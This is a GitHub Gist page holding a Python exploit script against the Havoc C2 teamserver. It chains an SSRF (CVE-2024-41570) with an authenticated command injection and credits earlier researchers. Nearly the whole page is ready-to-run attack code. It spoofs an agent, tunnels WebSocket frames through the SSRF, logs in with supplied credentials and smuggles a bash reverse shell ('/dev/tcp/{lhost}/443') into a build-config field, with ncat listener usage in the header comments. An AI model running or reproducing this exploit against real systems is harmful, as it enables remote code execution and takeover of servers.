Last active
January 21, 2025 15:49
-
-
Save pich4ya/bda16a3b2104bea411612f20d536174b to your computer and use it in GitHub Desktop.
The modified exploit code of SSRF (CVE-2024-41570) from @_chebuya and authN RCE from Laurence Tennant, Include Security
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Havoc C2 SSRF to AuthN RCE | |
# @author longcat (https://sth.sh) | |
# | |
# sudo ncat -lvp 443 | |
# python havoc_ssrf2rce.py -t https://havoc.c2/ -l 1.3.3.7 --c2user 5pider --c2pass RKnnj5Vfq3bt9y7L | |
# | |
# The original authors are @_chebuya (SSRF) and Laurence Tennant, Include Security (AuthN RCE) | |
# Their writeups are great. I am so fascinating to read @_chebuya blog post :) | |
# My work is just to integrate them into one single shot exploit. | |
# In short, make WebSocket works with Havoc C2 Agent Payload | |
# | |
# Credit Original Exploit Author (SSRF / CVE-2024-41570): @_chebuya | |
# Blog: https://blog.chebuya.com/posts/server-side-request-forgery-on-havoc-c2/ | |
# Github: https://github.com/chebuya/Havoc-C2-SSRF-poc | |
# | |
# Credit Original Exploit Author (AuthN RCE): Laurence Tennant, Include Security | |
# Blog: https://blog.includesecurity.com/2024/09/vulnerabilities-in-open-source-c2-frameworks/ | |
# Github: https://github.com/IncludeSecurity/c2-vulnerabilities/tree/main/havoc_auth_rce | |
import binascii | |
import random | |
import requests | |
import argparse | |
import urllib3 | |
import os | |
import json | |
import random | |
import string | |
from hashlib import sha3_256 | |
urllib3.disable_warnings() | |
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) | |
from Crypto.Cipher import AES | |
from Crypto.Util import Counter | |
key_bytes = 32 | |
def decrypt(key, iv, ciphertext): | |
if len(key) <= key_bytes: | |
for _ in range(len(key), key_bytes): | |
key += b"0" | |
assert len(key) == key_bytes | |
iv_int = int(binascii.hexlify(iv), 16) | |
ctr = Counter.new(AES.block_size * 8, initial_value=iv_int) | |
aes = AES.new(key, AES.MODE_CTR, counter=ctr) | |
plaintext = aes.decrypt(ciphertext) | |
return plaintext | |
def int_to_bytes(value, length=4, byteorder="big"): | |
return value.to_bytes(length, byteorder) | |
def encrypt(key, iv, plaintext): | |
if len(key) <= key_bytes: | |
for x in range(len(key),key_bytes): | |
key = key + b"0" | |
assert len(key) == key_bytes | |
iv_int = int(binascii.hexlify(iv), 16) | |
ctr = Counter.new(AES.block_size * 8, initial_value=iv_int) | |
aes = AES.new(key, AES.MODE_CTR, counter=ctr) | |
ciphertext = aes.encrypt(plaintext) | |
return ciphertext | |
def register_agent(hostname, username, domain_name, internal_ip, process_name, process_id): | |
# DEMON_INITIALIZE / 99 | |
command = b"\x00\x00\x00\x63" | |
request_id = b"\x00\x00\x00\x01" | |
demon_id = agent_id | |
hostname_length = int_to_bytes(len(hostname)) | |
username_length = int_to_bytes(len(username)) | |
domain_name_length = int_to_bytes(len(domain_name)) | |
internal_ip_length = int_to_bytes(len(internal_ip)) | |
process_name_length = int_to_bytes(len(process_name) - 6) | |
data = b"\xab" * 100 | |
header_data = command + request_id + AES_Key + AES_IV + demon_id + hostname_length + hostname + username_length + username + domain_name_length + domain_name + internal_ip_length + internal_ip + process_name_length + process_name + process_id + data | |
size = 12 + len(header_data) | |
size_bytes = size.to_bytes(4, 'big') | |
agent_header = size_bytes + magic + agent_id | |
print("[***] Trying to register agent...") | |
r = requests.post(teamserver_listener_url, data=agent_header + header_data, headers=headers, verify=False) | |
if r.status_code == 200: | |
print("[***] Success!") | |
else: | |
print(f"[!!!] Failed to register agent - {r.status_code} {r.text}") | |
def open_socket(socket_id, target_address, target_port): | |
# COMMAND_SOCKET / 2540 | |
command = b"\x00\x00\x09\xec" | |
request_id = b"\x00\x00\x00\x02" | |
# SOCKET_COMMAND_OPEN / 16 | |
subcommand = b"\x00\x00\x00\x10" | |
sub_request_id = b"\x00\x00\x00\x03" | |
local_addr = b"\x22\x22\x22\x22" | |
local_port = b"\x33\x33\x33\x33" | |
forward_addr = b"" | |
for octet in target_address.split(".")[::-1]: | |
forward_addr += int_to_bytes(int(octet), length=1) | |
forward_port = int_to_bytes(target_port) | |
package = subcommand+socket_id+local_addr+local_port+forward_addr+forward_port | |
package_size = int_to_bytes(len(package) + 4) | |
header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package) | |
size = 12 + len(header_data) | |
size_bytes = size.to_bytes(4, 'big') | |
agent_header = size_bytes + magic + agent_id | |
data = agent_header + header_data | |
print("[***] Trying to open socket on the teamserver...") | |
r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False) | |
if r.status_code == 200: | |
print("[***] Success!") | |
else: | |
print(f"[!!!] Failed to open socket on teamserver - {r.status_code} {r.text}") | |
def write_socket(socket_id, data): | |
# COMMAND_SOCKET / 2540 | |
command = b"\x00\x00\x09\xec" | |
request_id = b"\x00\x00\x00\x08" | |
# SOCKET_COMMAND_READ / 11 | |
subcommand = b"\x00\x00\x00\x11" | |
sub_request_id = b"\x00\x00\x00\xa1" | |
# SOCKET_TYPE_CLIENT / 3 | |
socket_type = b"\x00\x00\x00\x03" | |
success = b"\x00\x00\x00\x01" | |
data_length = int_to_bytes(len(data)) | |
package = subcommand+socket_id+socket_type+success+data_length+data | |
package_size = int_to_bytes(len(package) + 4) | |
header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package) | |
size = 12 + len(header_data) | |
size_bytes = size.to_bytes(4, 'big') | |
agent_header = size_bytes + magic + agent_id | |
post_data = agent_header + header_data | |
print("[***] Trying to write to the socket") | |
r = requests.post(teamserver_listener_url, data=post_data, headers=headers, verify=False) | |
if r.status_code == 200: | |
print("[***] Success!") | |
else: | |
print(f"[!!!] Failed to write data to the socket - {r.status_code} {r.text}") | |
def read_socket(socket_id): | |
# COMMAND_GET_JOB / 1 | |
command = b"\x00\x00\x00\x01" | |
request_id = b"\x00\x00\x00\x09" | |
header_data = command + request_id | |
size = 12 + len(header_data) | |
size_bytes = size.to_bytes(4, 'big') | |
agent_header = size_bytes + magic + agent_id | |
data = agent_header + header_data | |
print("[***] Trying to poll teamserver for socket output...") | |
r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False) | |
if r.status_code == 200: | |
print("[***] Read socket output successfully!") | |
else: | |
print(f"[!!!] Failed to read socket output - {r.status_code} {r.text}") | |
return "" | |
command_id = int.from_bytes(r.content[0:4], "little") | |
request_id = int.from_bytes(r.content[4:8], "little") | |
package_size = int.from_bytes(r.content[8:12], "little") | |
enc_package = r.content[12:] | |
return decrypt(AES_Key, AES_IV, enc_package)[12:] | |
def build_websocket_frame(data_str): | |
""" | |
Build a masked WebSocket TEXT frame with FIN=1, opcode=1, and | |
a random 4-byte mask. Supports extended payload lengths up to | |
2^64-1 bytes (though in practice you rarely need >65535). | |
""" | |
payload = data_str.encode('utf-8') | |
# 1) The first byte: FIN=1 (0x80), OPCODE=1 (text) | |
first_byte = 0x81 # 0x80 + 0x1 | |
# 2) Determine length bytes | |
length = len(payload) | |
mask_bit = 0x80 # Must set the mask bit for client->server frames | |
if length <= 125: | |
# fits in 7 bits | |
second_byte = mask_bit | length | |
header = bytes([first_byte, second_byte]) | |
elif length <= 65535: | |
# use 126 + 16-bit length | |
second_byte = mask_bit | 126 | |
extended = length.to_bytes(2, byteorder='big') | |
header = bytes([first_byte, second_byte]) + extended | |
else: | |
# use 127 + 64-bit length | |
second_byte = mask_bit | 127 | |
extended = length.to_bytes(8, byteorder='big') | |
header = bytes([first_byte, second_byte]) + extended | |
# 3) Generate a random 4-byte mask key | |
mask_key = os.urandom(4) | |
# 4) Apply the mask to each byte of the payload | |
masked_payload = bytearray() | |
for i, b in enumerate(payload): | |
masked_payload.append(b ^ mask_key[i % 4]) | |
# Combine header + mask key + masked payload | |
frame = header + mask_key + masked_payload | |
return frame | |
def generate_sha3_256(data): | |
""" | |
Generate SHA3-256 hash of input data and return hex string | |
Parameters: | |
data: Input data (string or bytes) | |
Returns: | |
str: Hexadecimal representation of hash | |
""" | |
# Convert string to bytes if needed | |
if isinstance(data, str): | |
data = data.encode('utf-8') | |
# Create hash object and update with data | |
hash_obj = sha3_256() | |
hash_obj.update(data) | |
# Get hex representation | |
return hash_obj.hexdigest() | |
parser = argparse.ArgumentParser() | |
parser.add_argument("-t", "--target", help="The listener target in URL format (https://havoc.c2/)", required=True) | |
parser.add_argument("-l", "--lhost", help="The attacker IP that waits for reverse shell on TCP/443", required=True) | |
parser.add_argument("-i", "--ip", help="The IP to open the socket with", default="127.0.0.1") | |
parser.add_argument("-p", "--port", help="The port to open the socket with", default="40056") | |
parser.add_argument("-A", "--user-agent", help="The User-Agent for the spoofed agent", default="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36") | |
parser.add_argument("-H", "--hostname", help="The hostname for the spoofed agent", default="DESKTOP-7F61JT1") | |
parser.add_argument("-u", "--username", help="The username for the spoofed agent", default="Administrator") | |
parser.add_argument("-d", "--domain-name", help="The domain name for the spoofed agent", default="ECORP") | |
parser.add_argument("-n", "--process-name", help="The process name for the spoofed agent", default="msedge.exe") | |
parser.add_argument("-ip", "--internal-ip", help="The internal ip for the spoofed agent", default="127.0.0.1") | |
parser.add_argument("-c2user", "--c2user", help="The username for C2 login", default="5pider", required=True) | |
parser.add_argument("-c2pass", "--c2pass", help="The password for C2 login", default="RKnnj5Vfq3bt9y7L", required=True) | |
args = parser.parse_args() | |
lhost = args.lhost | |
c2user = args.c2user | |
c2pass = generate_sha3_256(args.c2pass) | |
# 0xDEADBEEF | |
magic = b"\xde\xad\xbe\xef" | |
teamserver_listener_url = args.target | |
headers = { | |
"User-Agent": args.user_agent | |
} | |
agent_id = int_to_bytes(random.randint(100000, 1000000)) | |
AES_Key = b"\x00" * 32 | |
AES_IV = b"\x00" * 16 | |
hostname = bytes(args.hostname, encoding="utf-8") | |
username = bytes(args.username, encoding="utf-8") | |
domain_name = bytes(args.domain_name, encoding="utf-8") | |
internal_ip = bytes(args.internal_ip, encoding="utf-8") | |
process_name = args.process_name.encode("utf-16le") | |
process_id = int_to_bytes(random.randint(1000, 5000)) | |
register_agent(hostname, username, domain_name, internal_ip, process_name, process_id) | |
socket_id = b"\x11\x11\x11\x11" | |
open_socket(socket_id, args.ip, int(args.port)) | |
json_payload = { | |
"Body": { | |
"Info": { | |
"Password": c2pass, | |
"User": c2user | |
}, | |
"SubEvent": 3 | |
}, | |
"Head": { | |
"Event": 1, | |
"OneTime": "", | |
"Time": "18:40:17", | |
"User": c2user | |
} | |
} | |
payload_str = json.dumps(json_payload) | |
frame_bytes = build_websocket_frame(payload_str) | |
request_data = b"GET /havoc/ HTTP/1.1\r\nHost: 127.0.0.1:40056\r\nUpgrade: websocket\r\nSec-WebSocket-Key: h/TPDav2VwnJVqKeDYxRgQ==\r\nSec-WebSocket-Extensions: permessage-deflate; client_max_window_bits\r\nSec-WebSocket-Version: 13\r\nConnection: Upgrade\r\n\r\n" | |
write_socket(socket_id, request_data) | |
write_socket(socket_id, frame_bytes) | |
randz=''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(16)) | |
portz=random.randint(1024, 65534) | |
print(portz) | |
json_payload = {"Body":{"Info":{"Headers":"","HostBind":"0.0.0.0","HostHeader":"","HostRotation":"round-robin","Hosts":"0.0.0.0","Name":randz,"PortBind":str(portz),"PortConn":str(portz),"Protocol":"Https","Proxy Enabled":"false","Secure":"true","Status":"online","Uris":"","UserAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"},"SubEvent":1},"Head":{"Event":2,"OneTime":"","Time":"08:39:18","User": c2user}} | |
payload_str = json.dumps(json_payload) | |
frame_bytes = build_websocket_frame(payload_str) | |
write_socket(socket_id, frame_bytes) | |
cmd=f"echo '/bin/bash -i >& /dev/tcp/{lhost}/443 0>&1' > /tmp/.{randz} && /bin/bash /tmp/.{randz}" | |
injection = """ \\\\\\\" -mbla; """ + cmd + """ && false #""" | |
json_payload = {"Body": {"Info": {"AgentType": "Demon", "Arch": "x64", "Config": "{\n \"Amsi/Etw Patch\": \"None\",\n \"Indirect Syscall\": false,\n \"Injection\": {\n \"Alloc\": \"Native/Syscall\",\n \"Execute\": \"Native/Syscall\",\n \"Spawn32\": \"C:\\\\Windows\\\\SysWOW64\\\\notepad.exe\",\n \"Spawn64\": \"C:\\\\Windows\\\\System32\\\\notepad.exe\"\n },\n \"Jitter\": \"0\",\n \"Proxy Loading\": \"None (LdrLoadDll)\",\n \"Service Name\":\"" + injection + "\",\n \"Sleep\": \"2\",\n \"Sleep Jmp Gadget\": \"None\",\n \"Sleep Technique\": \"WaitForSingleObjectEx\",\n \"Stack Duplication\": false\n}\n", "Format": "Windows Service Exe", "Listener": randz}, "SubEvent": 2}, "Head": { | |
"Event": 5, "OneTime": "true", "Time": "18:39:04", "User": c2user}} | |
payload_str = json.dumps(json_payload) | |
frame_bytes = build_websocket_frame(payload_str) | |
write_socket(socket_id, frame_bytes) | |
print(read_socket(socket_id).decode()) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment